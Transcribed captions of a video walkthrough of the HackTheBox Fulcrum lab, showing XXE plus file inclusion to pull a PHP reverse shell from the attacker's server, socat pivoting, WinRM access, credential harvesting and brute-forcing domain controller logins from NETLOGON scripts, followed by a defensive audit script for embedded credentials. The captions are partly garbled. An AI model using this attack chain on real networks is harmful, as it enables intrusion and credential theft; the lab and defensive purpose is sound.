Network Pivoting on Windows Active Directory | HackTheBox Fulcrum

Captions
Welcome back to another video. In today's video we're going to talk about pivoting on Windows Active Directory. Previously we talked about pivoting on Linux, and we saw that using SSH local port forwarding and remote port forwarding enabled us to communicate with other Linux machines that may reside on other networks. You can also visit my video on Docker exploitation, where we talked about pivoting on Docker; the concepts can be applied to pivoting in general.

Now how about Windows? What is the actual scenario we can go through if we want to do pivoting on Windows? I created this scenario here, and the best practical machine I found on the internet was Hack The Box Fulcrum. This machine, which you can find on Hack The Box, best demonstrates the concept of pivoting on Windows Active Directory machines. So what happened? Basically we have our attacker machine, from which we do testing all the time, and we got access to a Windows machine. The Windows machine resides on a network such as 10.10.10.0.
This is just an example, not the actual network address. We got access to the Windows machine by some sort of web exploitation, so we landed some sort of shell. Once we were on the Windows machine we found that there were other machines on a different network: the Windows machine resides on a network which is totally different from this one. The other network contains a web server machine, a file server machine and a domain controller machine. All of these machines are part of the domain; the domain controller machine is here, and they're all connected through the domain. But these machines are located on a different network, which I call the AD network, the Active Directory network, and it's totally separate from the Windows machine's network. Say you call it 172.16.0.0.

As far as this machine is concerned, we are fine: we got a foothold on it through the exploitation. Specifically, on the Hack The Box Fulcrum machine it was XXE exploitation; we exploited an XML vulnerability in JSON. That's not the topic of this video, but we're going to demonstrate it when we get into the practical part. More importantly, how do we interact with these machines from our attacker box? The solution is to use pivoting, or port forwarding. From the Windows machine we apply port forwarding, so that all connections that come to the Windows machine on a specific port are forwarded on. We pick a port; the port we selected on the machine was 62015. We make the Windows machine listen on this port and we create a rule such that connections coming to this port will be forwarded to the first machine, the web server machine. So from port 62015 we port forward from this port to another port
on this machine. Now the selection of the port on the web server machine depends heavily on what kind of open ports the web server machine has. We found that the WinRM port, the Windows instrumentation port, is open on this machine, so we forward from 62015 to this port. From my attacker machine, what I do is connect to port 62015, and the port forwarding rule I created on the Windows machine will take care of the rest: it will forward my connection from 62015 to the WinRM port on the web server machine. That's how I can interact with the internal network from my attacker machine. Once I am here I will be able to pivot to these machines easily; no need to create any other port forwarding rules. It only takes one to get us inside the network. Once we are inside the network we can pivot freely from the web server machine to the file server machine, and from the file server to the domain controller. That's the pivoting process.

Now, what to use if you want to do port forwarding on Windows? There are several methods. The first one we can use is plink. The other method we can use is socat. The method I use in this video, and the one that worked for all the people who did this machine, is socat. You may need to use plink in other scenarios; that entirely depends on what works for you.

So now that we've talked about the theory, let's jump to the practical scenario and close the board. This is the nmap scan running. I'm going to skip this part but we'll keep it running so that if we need to come back to it we'll be able to do that. Let's copy the machine IP address, and I'm going to browse directly to the ports that were open; you can do the nmap scan on your own and find these ports as they are. The first port was 4. If you navigate to this port you will see that
the page displays that the machine is under maintenance. Click on "try again" and it takes you to another page, but as you can see the contents of the page stay the same while the URL changed. Take a look at this: index.php and the parameter page=home. This hints at a file inclusion vulnerability, a local file inclusion vulnerability, but we're not going to be able to do anything with this vulnerability yet. We'll keep this in the notes and get back to it later.

The other port that is open on the machine, which you can access through the web, is 56423. Unable to connect; let's see why. Is there a proxy? Uh-huh, we have a 6 here: 56423. Let's see this now. It worked; as you can see we received a JSON response: ping, pong, heartbeat, ping, pong. This is just a response, in JSON. We can also look for an XXE vulnerability on the JSON site. This page lays down how to play with the content type in order to exploit XXE on REST endpoints. Here you can see all of the details. Basically what we're going to do is make a POST request, and in the POST request we're going to change the content type from JSON into XML, and in the payload, instead of sending a JSON payload, we will be sending an XML payload. That's how we will exploit this vulnerability. You see an example: as you can see, in the POST request sent to the vulnerable page the content type has been changed to application/xml, and instead of the JSON payload we actually sent an XML payload. The XML payload reads the contents of the passwd file, and that's exactly what we will be doing. Remember that when we accessed the machine on port 4 there was a file inclusion vulnerability; we suspect of course that there is a file
inclusion, or at least it's a candidate for a file inclusion vulnerability. What does this mean? It means that if we craft an XXE payload, what the XXE payload does is download, say, a PHP reverse shell from my machine. Once it downloads the PHP reverse shell I want to execute it. How? I will use the local file inclusion here; I'm going to include it here as a local or remote file inclusion. So in the XXE payload, instead of this one I'm going to use this URL, and instead of home I will assign the path to the shell on my web server. That's how we will be able to exploit this vulnerability and get the first foothold.

Back to work. The scan is finished; as you can see these are the open ports. We have 4, which we discovered, and we discovered other ones; we navigated through this one and this one. The other ones are 80, 88, 22 and 9999. What is the next step? The next step is to navigate to the machine directory I created. Clear. So, curl: this is how we will send the payload. We use curl, we define the URL, which is the machine IP address along with the port, -X to specify the HTTP request type, which is POST, and you specify the data; as you can see this is the XXE payload. Let's go over the payload step by step; it's easier to go over the payload here. XXE, let's see, yeah, XXE against JSON. This is your payload. By the way you can also send the POST request in Burp; you can make the POST request to the page and use Burp if it is easier for you.

Let's go over the payload. First we define the XML version and the encoding, no brainer. Next we define the DOCTYPE; since this is a test payload for the purpose of taking notes I named it test, but of course you can name it whatever you want. Next we define the entity that will hold the payload; in my case I used the file /etc/passwd to read the contents of the passwd file. Now
the structure is the same: in here we define, or put, whatever payload you want. Next we define the root element. It's very important for any XXE XML payload to contain the root element; without the root element it's not going to work. Define the root element, and then here, search name, and in the value you can mention or call the entity you created which contains the payload. We call it by adding an ampersand and the name of the entity along with a semicolon. Let's go back here. So this is our payload right now: I call it hack, and the entity we named xxe. So here I read, let's see this one, yeah. What happens here: instead of reading the contents of the passwd file after SYSTEM, I defined the payload as such: I browse to the machine IP address, in this case localhost, since it's viewed from the perspective of the machine itself, and port 4. Port 4 is the one that is suspected to contain the inclusion vulnerability: index.php?page=, and in here I include the path to the shell. The shell is a PHP reverse shell that I will host on my web server. What's going to happen now: once I send this payload, the machine on 10.10.10.62 will perform a call to this URL and download and execute the shell.

So let's open up the server with Python. The PHP reverse shell, take note, connects to port 4545 on my machine, so I'm going to open the listener to receive the incoming connection, hopefully: nc -lvp 4545. Once I hit enter it's supposed to work. Ping pong. Aha, it means we haven't looked here, we haven't received the request. This means something has changed. I need to take a look at my IP address: is it correct? Aha, the IP has changed; it is .3 instead of .2. I'm going to keep this running, but in the payload we will modify the IP part: instead of 2 I'm going to put 3. We get back to the listener, refire the listener here and
execute the payload. As you can see the file has been requested. Let's take a look here, but we haven't received anything; we received ping pong and the GET for shell.php. This means that the shell itself has the wrong parameters, so let's check the shell out. This is a regular PHP reverse shell. Uh-huh, as you can see the IP is different. Now we put 3 here and hopefully it's going to work. Resend the payload, and now we receive the first foothold.

From this point on we will discover what machine we are on, and then we perform the pivoting. Let's see who we are first: id, and we are www-data. pwd: we are at /. Now let's see if there is a directory called var. ls, yeah there is. cd www; here is the web directory. We go to html: nothing in html. Let's go back and go to uploads. There you go: there is the home, the index and the upload PHP. There is one interesting script: Fulcrum_Upload_to_Corp.ps1. If we cat this one and take a look at the contents of the script, let's see here: "to forward the PowerShell remoting port to the external interface; password is now encrypted". There is a variable called $1 and the value is webuser; here is $2, and we have $3, base64; $4 takes $3, which is this one, basically $3's value, and ConvertTo-SecureString -Key $2. So it's kind of encrypting the password; this script is designed to create an encrypted password using ConvertTo-SecureString. Finally, New-Object System.Management.Automation.PSCredential($1, $4): $1 is the webuser and $4 is the encrypted password. So basically what it does is create an encrypted password up to this point. Next, what we are doing here is creating a credential using PSCredential. The unique feature of PSCredential is that once you create a credential and assign it to a variable, let's say $5, you can use $5 in whatever commands you want that require authentication. This is
an example: Invoke-Command -ComputerName upload.fulcrum.local (this is clearly part of the domain) -Credential $5 -FilePath data.ps1. In order to connect to the computer "upload" here with this file we have to define the credential. Since we use the PSCredential method, we can just mention the variable $5 and it would automatically recognize the username and the password, which are webuser and the encrypted password that is stored in variable $4. That's the feature of PSCredential.

So what's in this for us? We've got how the script works; what do we do now? Basically, from PSCredential we can revert the password and get the original form using GetNetworkCredential. Let's see how this works. Let's copy the script to our local machine and try to get the password. The script is here, I guess; let's see what it is. cat powershell: this is the script which I copied previously. Now execute the script here using pwsh (to launch PowerShell in Kali) and the name of the script. Once you execute that, as you can see, it gives you the password. What happened? As you can see, I added one line; take a look at it. This line takes the credential stored in the variable $5 and uses the GetNetworkCredential method, which is used just to get the password back to its original form, using .GetNetworkCredential().Password. That's how we managed to "decrypt" the password. Actually we didn't decrypt the password; we just restored the password to its original form. It's not decryption, I'm not going to call it decryption; we just used the GetNetworkCredential method along with .Password to get the password stored in the variable that was formed here. Note that if you want to use the GetNetworkCredential method to restore a password to its original form, you need to make sure that the password has been encrypted with the PSCredential method. If it was encrypted with this
method, it means you can't restore it with GetNetworkCredential; you may need to use Get-Credential, which requires interaction with the GUI interface. Let's not confuse things now and not dig deep into non-relevant stuff in this video. That's how the script works and that's how we restore the password. Take note that we now have the username webuser and the password. What's the actual use of these two? We're going to get to that.

If we go back to the machine here and type ifconfig to see the configuration of the machine, let's take a look: we have various network interfaces, many interfaces. We have ens32, which is the current one, and the loopback, that's fine, but take a look at virbr0. This is a different network IP address, which means, back to the introduction of the video, there is another network that resides on or uses this IP address. We want to find out what this network is. What do we do? We're going to perform an nmap scan. Let's go to /tmp. Again, my machine has the web server open on port 8000 and I have the nmap binary downloaded to my web server directory at fulcrum. You can copy this binary from your local Kali machine or download it from the internet; make sure it's the correct one. Going back here, I'm going to say wget http://...14.3:8000/nmap to retrieve nmap from there. Right now we have retrieved nmap from our machine. Let's now do an nmap scan on the entire network. Which network? The network we found here: 192.168.122.1. Scanning the whole network is actually useful if you want to reveal what the live hosts on this network are, but this won't be enough; as we will see, we also want the open ports of each of the machines on this network. Let's take this IP address and scan it to see what the hosts are here. First we have to define
the subnet mask: it is 255.255.255.0, which means the CIDR is /24. We go back and ls, then chmod to give nmap execution permissions. Now nmap --datadir nmap; we use this to mimic the scan process as if we're doing it from the attacking box, our Kali box, and then we scan the network based on the IP /24. Now we need to find what the live hosts on the network are. There is another method to just jump directly to the IP addresses of the machines that reside on this network: instead of using nmap we can also use the ARP table.

The nmap scan has finished. As you can see we have two live hosts. The first one is 192.168.122.1; these are the open ports; as you can see I have Kerberos, Active Directory. Lastly we have this one, take a look, it ends with .228, and these are the open ports. Our focus and concentration now will go toward this one; this is the next machine that we need to pivot into. Before firing the socat listener we need to find out if there are more open ports on this machine, so again we run the nmap scan one more time, to discover all the ports on this machine. Hopefully this won't take much time. From the nmap scan results we see one more port has been discovered: 5986. This is Windows Management Instrumentation, which is used for PowerShell remoting. What does this mean? It means we can now use WinRM to log in directly to the machine on the IP address that ends with .228. But remember that we cannot do that from our attacking box, since this machine resides on a totally different network than the network we have just compromised on this machine. So what we're going to do now is perform pivoting, or port forwarding, using socat. Let's see where I can find the shortcuts: lateral movement using socat. So this is lateral movement; let's see what socat has to offer. So
first we create the forwarding rule. As you can see, we define the port on which the compromised machine will listen, and we define the IP address of the other machine which we would like to access on that port. Let's copy that. Oh, first we have to copy socat to the compromised machine: pwd, /var/tmp, ls, see if we have it. We don't have it, so let's use my web server: http://...14.3:8000/socat. "socat cannot be found"; unless I have socat here, what's the problem? Oh, it is the wget, guys. Oh my goodness, how can one forget this. Paste; now we have socat. Let's go back to my notes and copy this. I'm giving it the same port, copying up to the point where I need to define the IP address, since it is different. The IP address is 192.168.122.228. Let me see, yes it's correct. Lastly, do we have anything else to define? Nope. What happens here: remember that we are at the compromised machine; we are opening port 60333. The compromised machine is now listening on this port, and incoming connections on this port will be forwarded to the machine that you would like to access. I forgot to put here the port that we would like to access; in this case, since we want to interact with the Windows instrumentation port, or PowerShell remoting, the port we would like to interact with is 5986. So, 5986, and that's it. Directly now we can interact with the WinRM port. Permission denied, thank you very much: chmod +x socat. All right, now it's ready. All we have to do now is send connections to port 60333 and they will be forwarded to port 5986. Remember that 5986 is the WinRM port, which means we will end up interacting with PowerShell, so this needs to be done from a Windows machine, right? But an alternative way is to use Ruby. With the Ruby language we can create a Ruby script, and inside the Ruby script we
can put PowerShell commands. There is a script I found on the internet; as you can see it's authored by a user called Alamot on GitHub. This is the script winrm_shell_with_upload. If you take a look at the script we need to define the IP and the port; the IP and port of what? Of the machine we have compromised and the port it's listening on. Username and password: this is authentication. It assumes that you have authentication information to access the PowerShell remoting. If you remember, we got these credentials: webuser and the password (m4ng...). We can use this credential and supply it here as username and password. Next, as you can see, we are using WinRM to interact with the machine we are targeting, which happens to be the machine on 192.168.122.228. The script has already been created in my working directory; let's see here: this is nmap, reverse shell, powershell; let me take a look at this one, cat script.rb. Yeah, this is the script. Let's now make a slight modification to the script: instead of 60217 I'm going to type the port that I created as a listener port, 60333. These are the correct credentials, and now once we launch the script using Ruby it will interact with port 5986 and give you PowerShell access, or PowerShell remoting. Let's see how this works: sudo ruby script.rb. All right, aha, as you can see we now get PowerShell access. This PowerShell access, or PowerShell remoting, has been facilitated by the fact that the corresponding port on the target machine is open; if this wasn't open we couldn't get to this. So take note that we are now using WinRM, not a reverse shell; this is not a reverse shell, this is PowerShell remoting access using port 5986, facilitated by the fact that we're using Ruby here, so we don't need to use Windows PowerShell on my Windows machine. That is how good the script is. So
right now we are at the web server machine that we talked about at the very start of the video; right now we are inside the other network. If we type ipconfig, will this work? Let's take a look: Windows IP configuration, Ethernet adapter, 192.168.5.5. I don't know why it is .5.5; it should be 192.168.122. Anyway, let's now start enumerating this machine, the web server one, and see if there is another machine we can pivot into. Since the name indicates the presence of a server, we need to navigate to the server directory on the Windows server, so cd C:\inetpub\wwwroot; this is the web server directory on Windows servers. Uh-huh, what do we have here? We have index, and we have web.config. Enumerating configuration files is important and tremendously helpful when you are doing enumeration on compromised machines, since configuration files may hold plaintext credentials. So, type web.config; let's see what the configuration in this file is. Okay: connection string LDAP dc.fulcrum.local. Here we have the main domain, fulcrum.local, and here's the domain controller. Next, what do we have: add name, system, connection string name, public key, connection username fulcrum\ldap. So this is another machine on the domain controller: we have dc, we have fulcrum, and we have also the web server, don't forget this. So now we discovered another machine on the Active Directory network; it is fulcrum\ldap, and this is the password. By the way, oh my god, this is not the machine name, that's the username, I know, but actually it contains information about the machine name. Here we have the connection password. What does this mean? It means we can now pivot to this machine using also WinRM. Before doing so, let's execute a couple of LDAP queries to get more information about the
domain controller and this machine here. Now we execute some LDAP queries to enumerate properties of these two common names. Let's see: if I go to Active Directory and search for an LDAP PowerShell script for user enumeration... nope, nope, nope. "Executing LDAP queries for data harvest", that is cool, let's see: harvesting computer names. This is LDAP where we can execute, defining what the domain controller is; in this case we replace the domain controller with fulcrum, the target machine is ldap, the target machine name is fulcrum here if I am correct, and we define the target machine password, it's already here, and then we display the properties. All right, let's take this one. Before taking that one let me define it here in my notes: domain controller will be replaced with fulcrum, target machine will also be fulcrum, target machine password will be this one. Let's now execute this query and see what it yields: displaying the properties about these two. We have two common names: DC, the domain controller, and FILE, that's the common name of the other machine. That's fine.

Now let's see if we can harvest other information. Again we replace fulcrum with the domain controller name, or let's just copy that, I don't want to mess up the original one. Copy that, we have this target machine and the password, where is the password, there you go. Let's now find all of the properties and information about these two common names. What is that? Let's start from the very first: name, value, okay, common name, description, name Bobby Tables, bad password time, info "password set to file server logon", okay, that's the password for what? Let's scroll down: CN btables, sAMAccountName btables. Uh-huh, that's the machine which has the common name FILE; I suppose this is the file server machine. That is the username, and that's supposed to be the password. So here we go: you have the login information for what? For the file server
machine, which is btables at fulcrum.local as the username and this as the password. What's going to happen now? We need to pivot to this machine somehow. We can actually use the same method: we can go back to our Ruby script and modify the script a bit to return a reverse shell. If you remember, if you go back to the nmap scan, you can see there is port 53 open, so we can actually make call-outs from the web server, or the file server machine, this one, to connect back to us. What's going to happen now? Let me see. Let's go to another tab, ls, this script here we can modify a bit. This is the modified version; let me take a look at it. This is the contents of the script, version 2. Again we are forwarding the connections on port 60333 in order to access other machines, and we're using the same credentials we discovered at the very start of the video. Next, what we are doing here: instead of opening a PowerShell remoting session, since we have one session here that uses PowerShell remoting on the Windows instrumentation port, we cannot just create another one; we can only use one. That's why we need another method to access the file server machine, which has the common name FILE, file.fulcrum.local. This machine needs to be accessed in another way in order to maintain this session here at the web server machine. If you don't want to keep the current connection to the web server machine you can just cut it and modify the script with the credentials we have just obtained, which are btables and this password, and make another PowerShell remoting connection to the file server machine. But if you want to keep this connection we need to use another method, so the method here is like that. What happens here? I prefer that we open this in the file editor in order to have a
full view of the script. Desktop, fulcrum, and we take a look at this in Mousepad. Okay, way better. This is for the forwarding, and next, what do we do here: we create a connection. In the connection, first we create a variable called password; the password contains the password we have just found for the file server and converts it into a secure string. Next we create a credential using the PSCredential method and we specify an argument list. The argument list is actually the connection information: first we have the username, btables, and next we have the password; actually we only mention the variable, since we have defined the variable at the very start and it contains the password as a secure string. Now that we have defined the credentials we can use Invoke-Command to let the machine call out, or perform a reverse shell. We specify the computer name, it's FILE since this is the common name we have found, -Credential $cred, where $cred is the variable that stores the credential, both username and password, and the port, 5985, the default port. In the ScriptBlock the content is the reverse shell itself; we connect to my machine on port 53. Let's do this. Save? We don't need to save, I haven't made any changes. Okay, so now, this is the web server machine... I'm confused; this is the original machine we have compromised, fine, the web server machine. Let's now stop the web server and open the port, with sudo; you actually need to use sudo in order to be able to open a port below 1024. So now we listen for incoming connections on port 53. Get back, now we execute the script, ruby script_v2, and hopefully it will work. If it didn't work we may need to stop all of this. Ah, we received the connection, that's fine. id: right now we are the btables user. whoami:
right now we have fulcrum\btables, a totally different user. This is the file server machine, this is the web server machine: we successfully performed the pivoting. The last step is to perform pivoting to the domain controller. Now if we get back to the nmap scan we performed from the compromised machine, remember that these were the open ports: 42, 53, 80 and 88, so the domain controller machine must have the NETLOGON share open. The NETLOGON share is a share on the Windows domain controller machine that contains logon scripts and other executables; it's very useful if you enumerate this. But how to access that from the file server machine? You need to use, also, yeah I'm going to call it PowerShell pivoting. In this case I'm going to see where I can find the correct command because I can't memorize commands; let me search for NETLOGON: "accessing netlogon share on Windows DC". Here is the command: net use, specify the domain controller, netlogon, username and password. So let's see: net use, the name is dc.fulcrum.local, netlogon, okay, /user: domain name backslash username; the domain name is fulcrum.local, so fulcrum backslash username; the username is btables, guys, it's here, so b..., and lastly we need to define the password, the password of the machine we have just pivoted to. Let me see where the password is; here is the password. The command completed successfully. Okay, let's see now if we can access NETLOGON here: cd into the Microsoft.PowerShell.Core\FileSystem:: path for \\dc. So we successfully accessed the NETLOGON directory. Look, we have several scripts here, since NETLOGON contains the scripts and executables for the logon. If we enumerate them or take a look at one of them, we can actually get an idea of what happens in the logon process and hopefully
we reveal credentials let's take a look at this one for example yep copy that get or type all right map network drive user and password here we go we revealed one username and password but how do we know these are for the domain controller since now the last step is to pivot the domain controller we need the admin username and the password now all of these scripts are similar in content they both contain username uh definition of username and a password assigned to the corresponding variable but how do we know which one is for the domain controller so basically we need to do scripting here we need a partial script that iterates through all these scripts try them against the domain controller machine and gives us what is the correct pair of credentials say nano um brute force dc what do you think ps1 all right so here if define a function i'm going to call it brute force it takes two arguments username and password so we call the first one user and the next one is pass next we define take another line what about the indentation here okay this is fine so new object directory services directory entry and defined username user pass space name dash and e and then put that into null so that's the function it takes to the remainder two arguments and passwords and use them for the directory or prepares them for use in the directory services next we need a for loop here okay or a loop in partial it's called for each this loop will iterate through all of the files we have here these files so first let's create a variable called whatever coded files and define get child item since we need to since we need to we need the variable to iterate or to access a list of all the files we need to use the method get child item where will be here this is the path uh we have four here okay cancel the four and all the files that ends with ps1 next for each to for the iteration for each file in files okay now we need to create the list of variables that will hold the value from each attempt 
so let's call it first result select string path the file this variable will change the value of this variable will change every time it handles a different file so there's pattern next we define the pattern of the password let's take a look here so this is the pattern for all of the passwords you have at fulcrum this one is constant and these changes actually these characters change this is constant so some sort of regular expression would solve the problem so double quotes inside double quotes we open two single codes and inside the single quotes we open two parentheses and type here dot star okay next here we define the variables of both username and password since we use user and pass we're going to use different names so say user v1 does it make sense okay take the result we'll take the variable result from the first query and do some matches the first index groups one at one here and lastly value so the next one is kind of similar i'm going to copy that and here change the index to one this one needs to be pass lastly perform an if condition okay in the if condition in the conditional statement we will now try the credentials we have grabbed from the first file or from the files against the domain controller if they work we're going to display them back to the stood out so if we call the function br fulcrum and then we have first user v1 first argument wait so we have user v1 here it will replace the argument user if i'm correct okay that's fine next we have the next argument which is pass v1 which will be the corresponds to the pass argument in the function so pass v1 how many parentheses do we have in here so one okay next echo fulcrum i'm gonna copy this one it's way better so that v1 and pass v1 we echo out the username and password if they are correct that's the script now you can take all the script guys and make it as a one-liner okay i paused the video to finish uh pasting the comment in here and now it's running now in a separate part in a separate 
tab here i'm going to assume that we will get the username and password of the domain controller next we have two options the first one you can modify on the script v2 let's take a look at the script v2 what you can do here we can keep these as they are but modify on the line here instead of the instead of this password we're going to put the password that we will get from the script we have just created and instead of we're going to just do the modifications required the username the password of the domain controller and if i change this to dc all right and execute the script of course don't forget to create a listener on port 553 and you will get the reversal on the domain controller an alternative method is to just flat out get the flag right so we can do that easily with one liner let's see where i can find one liner here execute the remote commands on a domain machine with their pair of credentials so we can take this guys define the password in a variable called pass and then define the credential of the domain controller and then in the script block you can execute whatever you want let's take this one this one needs to be executed from the powershell so we need the session here we have the script hasn't finished yet so let me do it from here let's first modify what i guess because the shell isn't stable so password converse convert secure string as plain text and here is the pass the password will be i'm gonna just copy it from my notes guys okay this is the password for the dc and then credential we define the credential domain name username so here we define the domain in the windows fulcrum as you know so fulcrum the username for the dc was 923a as you will find now once the script finishes uh dash invoke comment that's computer name the computer name goes here it is dc dot folk from dot local credential grid we have it defined here dashboard 5985 the script to block the skill to block here will be displaying out d flag so cat c users administrator 
desktop slash root text let's try this here from the web server machine see if it works didn't work so as you can see the script has finished and here is the username and password fulcrum local 923a and this is the password these are the credentials that worked on the domain controller let's now execute now the oh no no what happened execute now this here from the observer machine see if it worked no cat nothing happened i guess right one more time and here is the flag now let me try to submit the flag submit flag difficulty of this machine i guess it is extremely hard yeah it was extremely hard actually submit all right guys so i hope you find the video informative and helpful and we will definitely see you in the next video
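The weakness the walkthrough leans on is logon scripts in NETLOGON that carry plaintext credentials, which any domain user can read. The following is an added example, not code from the video or from its author, written from the administrator's side: it walks a NETLOGON share, extracts credential-looking pairs from scripts, and, only when asked, bind-tests them with the same DirectoryEntry mechanism the video's script uses, so that still-valid secrets can be rotated before someone else finds them. The share path `\\dc.fulcrum.local\NETLOGON`, the LDAP path, the file types and both regular expressions are assumptions for this demo and will need adjusting to the scripts in your own environment.

```powershell
# Added example, not code from the video: audit a NETLOGON share for logon
# scripts that embed plaintext credentials, so an administrator can find and
# rotate them. Assumptions: the share path, the LDAP path, the file types and
# the two regex patterns are constructed for this demo.
param(
    [string]$ScriptRoot = '\\dc.fulcrum.local\NETLOGON',   # assumed share path
    [switch]$Validate                                       # bind-test only on request
)

# Credential shapes commonly seen in logon scripts (constructed patterns):
#   1. "net use X: \\server\share /user:DOMAIN\name password"
#   2. PowerShell "$user = '...'" followed later in the file by "$pass = '...'"
$script:Patterns = @(
    '(?i)/user:(?<user>\S+)\s+(?<pass>[^\s/]+)',
    '(?i)\$user(?:name)?\s*=\s*["''](?<user>[^"'']+)["''][\s\S]*?\$pass(?:word)?\s*=\s*["''](?<pass>[^"'']+)["'']'
)

function Find-EmbeddedCredential {
    param([Parameter(Mandatory)][string]$Path)

    $findings = @()
    # -Include only filters when the path carries a wildcard, hence Join-Path with '*'.
    $files = Get-ChildItem -Path (Join-Path $Path '*') -File -ErrorAction Stop `
                 -Include '*.ps1', '*.bat', '*.cmd', '*.vbs'
    foreach ($file in $files) {
        $text = Get-Content -Path $file.FullName -Raw -ErrorAction Stop
        foreach ($pattern in $script:Patterns) {
            foreach ($m in [regex]::Matches($text, $pattern)) {
                $findings += [pscustomobject]@{
                    File     = $file.FullName
                    UserName = $m.Groups['user'].Value
                    Password = $m.Groups['pass'].Value
                    Valid    = $null      # filled in only when -Validate is given
                }
            }
        }
    }
    return $findings
}

function Test-DomainCredential {
    param(
        [Parameter(Mandatory)][string]$UserName,
        [Parameter(Mandatory)][string]$Password,
        [string]$LdapPath = 'LDAP://dc.fulcrum.local'   # assumed DC
    )
    # Same mechanism as the video's script: an LDAP bind through DirectoryEntry.
    # Reading NativeObject forces the bind; a wrong password throws.
    # Each attempt is recorded on the DC (4776 for NTLM validation, 4771 for a
    # Kerberos pre-auth failure, 4625 for a failed logon), so a validation run
    # is itself visible in the security log and should be scheduled, not ad hoc.
    try {
        $entry = New-Object System.DirectoryServices.DirectoryEntry($LdapPath, $UserName, $Password)
        $null = $entry.NativeObject
        return $true
    } catch {
        return $false
    } finally {
        if ($entry) { $entry.Dispose() }
    }
}

$findings = Find-EmbeddedCredential -Path $ScriptRoot
if ($Validate) {
    foreach ($f in $findings) {
        $f.Valid = Test-DomainCredential -UserName $f.UserName -Password $f.Password
    }
}

# Report file, account and validity only; the password itself never goes to
# the console or a log.
$findings | Select-Object File, UserName, Valid | Format-Table -AutoSize
```

Run it from a domain-joined administrative host, for example as `.\Audit-NetlogonSecrets.ps1 -ScriptRoot '\\dc.fulcrum.local\NETLOGON' -Validate` (the file name is an assumption). Any row that comes back `Valid = True` is an account whose password is readable by every authenticated user of the domain; the fix is to rotate that password and replace the hard-coded logon with a mechanism that does not store secrets in a world-readable share, since the scripts themselves are exactly what an attacker enumerates once they reach NETLOGON.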
Info
Channel: Motasem Hamdan
Views: 5,959
Keywords: windows, pivoting
Id: RJ3qp4kjvuo
Length: 58min 36sec (3516 seconds)
Published: Wed Feb 09 2022